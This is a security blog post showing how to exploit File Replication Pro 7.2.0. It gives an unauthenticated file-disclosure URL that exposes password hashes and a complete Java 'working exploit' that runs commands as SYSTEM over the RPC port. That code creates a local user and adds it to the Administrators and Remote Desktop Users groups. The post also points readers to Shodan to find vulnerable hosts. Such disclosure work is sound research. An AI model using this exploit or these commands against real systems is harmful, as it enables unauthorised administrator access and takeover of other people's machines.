Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro 7.2.0 was released on this site. This post shows the steps involved to remotely gain access to the system that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step will be to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer , there will be a few services added to startup, namely 3 ‘prunsrv.exe’ processes as shown below. Note that the services are running under the privileges of the NT AUTHORITY\SYSTEM account:

frp1

The unauthenticated remote command execution vulnerability will be exploiting the way these processes handle password authentication to achieve command execution as the NT AUTHORITY\SYSTEM user. Using a browser, navigate to the localhost’s port 9200, which runs the replication RPC service. You should see the following:

frp2

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that the current RPC server does not require any form of authentication. This is the default behavior in a vanilla install. However, if you see an “ERROR” instead of an “OK”, it means that the RPC server is configured with a password and authentication is required. There is however another vulnerability that exists in the software that allows unauthenticated remote file access which can be abused to retrieve the password hash. FRP password hashes and configurations can be access remotely and unauthenticated using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

You should see the password hash in the configuration.xml file. If more clients have been added to the FRP management server, you will also be able to see all the other password hashes there. If you explore further and take a look into the .jar and .war files that can be found in the installation directory and figure how the software works, you can then proceed to create a malicious RPC client, that in this example, adds an arbitrary user to the remote system, and then adds this user to both the Administrator and RDP groups.

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to :9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

frp3

After the exploit code was successfully executed:

Screen Shot 2016-02-15 at 11.40.51 PM

frp4

frp5

If RDP was not activated on the remote host, you can always tweak the commands in the exploit to activate it. You should now be able to RDP to the box and access the box as an Administrator.

Here is a video showing the exploit in action:

Update: After a long time, the guys at FRP finally released the fixed version: https://frpsupport.fogbugz.com/default.asp?W291

frp2016-730-released

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s